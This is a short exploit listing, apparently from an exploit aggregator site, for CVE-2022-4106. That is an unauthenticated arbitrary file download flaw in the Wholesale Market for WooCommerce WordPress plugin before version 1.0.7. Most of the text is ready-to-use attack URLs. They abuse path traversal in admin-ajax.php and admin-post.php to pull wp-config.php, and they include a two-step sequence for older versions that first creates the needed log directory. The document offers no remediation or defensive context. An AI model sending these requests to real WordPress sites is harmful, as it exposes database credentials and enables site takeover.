Exploit for Wholesale Market for WooCommerce < 1.0.7 - Unauthenticated Arbitrary File Download CVE-2022-4106

Name: Exploit for Wholesale Market for WooCommerce < 1.0.7 - Unauthenticated Arbitrary File Download CVE-2022-4106
Rating: 5 (204 reviews)

2022-11-28 | CVSS 1.0

## https://sploitus.com/exploit?id=WPEX-ID:B60A0D3D-148F-4E9B-BAEE-7332890804ED
v 1.0.6

If the wholesale_market_import_error folder does not exist, issue is still exploitable as any authenticated user (same URLs as for v < 1.0.6)

If the folder already exist, exploitable as unauthenticated: https://example.com/wp-admin/admin-post.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin&section=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.php

v < 1.0.6 (as unauthenticated):

First call https://example.com/wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_read_csv which will create the log directory

Then call  http://example.com/wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin&section=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.php to download the wp-config.php